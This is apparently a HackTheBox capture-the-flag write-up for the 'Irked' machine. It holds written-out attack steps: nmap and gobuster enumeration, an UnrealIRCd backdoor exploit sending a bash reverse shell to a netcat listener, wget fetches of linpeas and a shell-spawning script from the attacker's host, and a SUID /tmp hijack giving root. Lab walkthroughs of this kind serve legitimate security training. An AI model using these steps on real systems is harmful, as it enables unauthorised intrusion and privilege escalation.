HackTheBox | Irked
Initial TCP Nmap Scan
Nmap scan report for 10.10.10.117
Host is up (0.077s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36530/tcp status
| 100024 1 45094/tcp6 status
| 100024 1 50161/udp6 status
|_ 100024 1 50210/udp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Full TCP Nmap Scan
Nmap scan report for 10.10.10.117
Host is up (0.076s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36530/tcp status
| 100024 1 45094/tcp6 status
| 100024 1 50161/udp6 status
|_ 100024 1 50210/udp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
36530/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Initial Thoughts Based On Nmap Scans
Based on the Nmap scans, I am going to just speak out my thoughts based on the ports I see from top to bottom. Starting with 22 - SSH, this is usually a port I will deal with once I have gotten some sort of username or credentials to log into an account. I will also quickly look to see if this is an out of date version as this may lead to SSH being vulnerable to an exploit. More likely than not it will just be a vector in which we use once we gain credentials / a username so we can brute force the account. Next, with 80 - HTTP, something to note about HTTP is that it is a beast on it’s own. I just start off small by simply looking at the site, taking a look at the page source and see if there is anything interesting in there, do directory brute forcing to see if I can discover any new directories on the website, look to see if I can identify any version numbers in which I can Google for an exploit for that particular service and version number, etc. Next, 111 - rpcbind which is a Portmapper which is just used to provide information between Unix based systems. You can usually go and probe this to fingerprint the OS and maybe obtain information about available services. This will most likely be the last port I look at as the exploit path is fairly niche in my experience so far. Next, we have a few ports (6697, 8067, 36530, 65534) for IRC which is an Internet Relay Chat. Essentially it is just a text-based chat system that can be hosted. For this, I will most likely just be Googling if there are any known exploits for this particular service “UnrealIRCd”. With my thoughts being expressed, let’s start this box!
HTTP - 80 | Enumeration
Firstly I start by just navigating to the page by going to http://10.10.10.117. There is nothing really interesting here besides a picture. I go ahead and run a gobuster scan against the web application.
gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Doing this did not really yield anything useful. Seeing that there is no directories being found, I tried to use some extensions for the gobuster scan as well and no luck.
gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.pdf
I went ahead and checked the page source as well and nothing was here except for the path to the image which was simply http://10.10.10.117/irked.jpg. As there was not really much to go off of at this point, I went ahead and left this on the back burner for now.
IRC - 6697/8067/36530/65534 | Enumeration
The first thing I did when seeing this was just do a simple searchsploit search which is a tool that simply archives the Exploit Database website for exploits.
searchsploit UnrealIRC
root@kali~searchsploit UnrealIRC
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I see one that mentions “Backdoor Command Execution”. Sounds pretty intriguing if you ask me. As I am prepping for the OSCP exam and Metasploit is limited, I go ahead and Googled for this exploit and found this. I go ahead and clone it onto my box.
git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git
Low Privilege Shell
Running the command I can see what arguments it needs for this exploit to run properly.
python3 exploit.py
root@kali-[/opt/UnrealIRCd-3.2.8.1-Backdoor]python3 exploit.py
usage: exploit.py [-h] -payload {python,netcat,bash} ip port
exploit.py: error: the following arguments are required: ip, port, -payload
So I need the IP address, the port number, and use -payload and specify what I want, either python, netcat, or bash. I’m going to use bash. Before I do anything else though I also need to change the local_ip and local_port variables to my own IP and a port I will be listening on. I chose 443 as the port I will be listening on.
vim exploit.py
# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.36' # CHANGE THIS
local_port = '443' # CHANGE THIS
I went ahead and saved the file. Now I can set up my Netcat listener on port 443.
nc -lvnp 443
With my Netcat listener set up, I can run the exploit:
python3 exploit.py 10.10.10.117 6697 -payload bash
root@kali-[/opt/UnrealIRCd-3.2.8.1-Backdoor]python3 exploit.py 10.10.10.117 6697 -payload bash
Exploit sent successfully!
Looking back at my Netcat listener I got a connection!
root@kali-[~]nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.117] 37515
bash: cannot set terminal process group (639): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ whoami && id
whoami && id
ircd
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
Privilege Escalation
Now that we have a low privileged shell, I am going to look for ways to escalate my privileges to root. Good thing to always run when you get a low privileged shell is to run linPEAS or winPEAS depending on what operating system you are on. For me, I am on a Unix based system so I will be running linPEAS. If you do not already have it, simply copy paste this into a file (using a text editor like vim, nano, etc.) on your host and name it linpeas.sh. After that, host a simple Python HTTP server by running this command (make sure you are running this command within the directory that has your linpeas.sh file in it:
python -m SimpleHTTPServer 80
Hosting a Python Simple HTTP server will let me grab the file from my host and get it onto the low privileged shell. To download linpeas.sh off of my host from the low privileged shell, I need to use some sort of command to download the file. Typically I would use curl which is used to transfer data from or to a server using protocols like HTTP, FTP, IMAP, you name it. This box however doesn’t have curl. Thankfully, there is another tool which is wget. Wget is a utility for non-interactive download of files from the Web. So I can use Wget to go and download the file from my host and put it onto this box. I’m going to go ahead and do that.
wget http://10.10.14.36/linpeas.sh
ircd@irked:~/Unreal3.2$ wget http://10.10.14.36/linpeas.sh
wget http://10.10.14.36/linpeas.sh
--2021-06-07 19:09:37-- http://10.10.14.36/linpeas.sh
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘linpeas.sh’
0K .......... .......... .......... .......... .......... 14% 324K 1s
50K .......... .......... .......... .......... .......... 29% 654K 1s
100K .......... .......... .......... .......... .......... 44% 4.35M 0s
150K .......... .......... .......... .......... .......... 59% 758K 0s
200K .......... .......... .......... .......... .......... 74% 3.90M 0s
250K .......... .......... .......... .......... .......... 89% 2.66M 0s
300K .......... .......... .......... ... 100% 2.18M=0.4s
2021-06-07 19:09:37 (943 KB/s) - ‘linpeas.sh’ saved [341863/341863]
Now that it is saved onto the box with the low privileged shell, I have to make sure the file is executable by running chmod +x.
chmod +x linpeas.sh
Now run it.
./linpeas.sh
This will give a lot of output. Something that seemed interesting to me under the “Interesting Files” section was this “Unknown SUID binary” under the path /usr/bin/viewuser. SUID is short for Set User ID which is a type of permission that allows users to execute a file wit the permissions of a specified user, this being the root user. So as the user we are right now (ircd), we can run this file.
════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-sr-x 1 root root 9.3K Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 95K Aug 13 2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon 50K Sep 30 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 14K Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 26K Mar 29 2015 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 34K Mar 29 2015 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root dip 332K Apr 14 2015 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 34K Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 14K Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 18K Sep 8 2016 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-- 1 root messagebus 355K Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 158K Jan 28 2017 /bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 9.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 77K May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 43K May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 38K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 38K May 17 2017 /bin/su
-rwsr-sr-x 1 root mail 94K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 550K Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 1.1M Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser (Unknown SUID binary)
I go ahead and test out what it does by just running it
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-06-07 09:01 (:0)
djmardov pts/0 2021-06-07 15:38 (10.10.14.36)
sh: 1: /tmp/listusers: not found
And it’s mentioning on the bottom something about /tmp/listusers was not found. Interesting. So it can’t find the file under the /tmp directory and it is trying to run it. Something to remember is that this is running as the root user so anything it will run will be ran as root. So technically, all we need to do is create a listusers file, put it into the /tmp directory, and have some sort of content within the listusers file that will spawn a shell. This is really simple so let’s do it. Firstly, I go ahead and use cd to change directories into /tmp
cd /tmp
Now I go back onto my host and create a file named listusers using a text editor like vim, nano, etc. Doesn’t really matter as long as you can write into the file. I go ahead and put the following into the file:
#!/bin/bash
bash
The #!/bin/bash is known as a “shebang”. This is used to essentially instruct this program to run from /bin/bash. Then all I put in there after is just bash. Typing bash into a terminal will just spawn a bash shell. So all this is doing is specifying we need to run from /bin/bash and then use the command bash to spawn a bash shell. Easy enough. Now I went ahead and saved the file and I start up another Python HTTP server. Again, I am using this so I can transfer the file from my host to the low privileged shell.
python -m SimpleHTTPServer 80
Now on the low privileged shell, I download the file from my host
wget http://10.10.14.36/listusers
ircd@irked:/tmp$ wget http://10.10.14.36/listusers
wget http://10.10.14.36/listusers
--2021-06-07 19:19:20-- http://10.10.14.36/listusers
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18 [application/octet-stream]
Saving to: ‘listusers’
0K 100% 3.86M=0s
2021-06-07 19:19:20 (3.86 MB/s) - ‘listusers’ saved [18/18]
Now that the file is in here, I am going to go ahead and run the SUID binary again.
/usr/bin/viewuser
ircd@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0 2021-07-07 09:01 (:0)
djmardov pts/0 2021-07-07 15:38 (10.10.14.36)
whoami && id
root
uid=0(root) gid=1001(ircd) groups=1001(ircd)
And I am now the root user!